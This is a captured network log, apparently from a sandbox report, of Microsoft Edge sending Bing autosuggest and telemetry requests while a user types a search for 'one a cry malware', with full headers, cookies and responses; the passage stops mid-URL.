https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1729199047029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199047286%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%22%2C%22AsResponseLength%22%3A%22509%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199047386%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%2Cig%3A9A0886B345F64DB5A9243A661E142758%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199047408%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199047955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A19358%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199047956%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1729199047029%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199047286%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%22%2C%22AsResponseLength%22%3A%22509%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199047386%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malware%2Cig%3A9A0886B345F64DB5A9243A661E142758%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199047408%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199047955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A19358%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199047956%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 527
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc9f4374727893ff81af2960599
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Rhq728/DFDtAnIX9ixnEOOBr25dNBAJATgI43WD9kkQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.14919ec7
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malwar&cp=16&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malwar&cp=16&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.14919f20
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malwa&cp=15&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malwa&cp=15&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 566
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc98b9a4c2583d5b684beae9621
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-vv+oTUxnWuy3y7N8bNmV6elCG3mud+JniQxjT6f2Q+o='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.14919efc
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malw&cp=14&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malw&cp=14&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 642
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc9dba94af09f813ced669f5cc0
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-pnjDXL7pRG0SziUfcfbAVM4XOMQpd7G9Fs01MCTdEfE='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.14919f6b
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20mal&cp=13&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20mal&cp=13&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.14919ff9
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199047977%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%22%2C%22AsResponseLength%22%3A%22508%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048074%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwar%2Ci%3A1%2Cig%3A95889F87F7E74E968DD87D7C89531C3E%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048075%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048528%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%20malwa%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048549%2C%22Name%22%3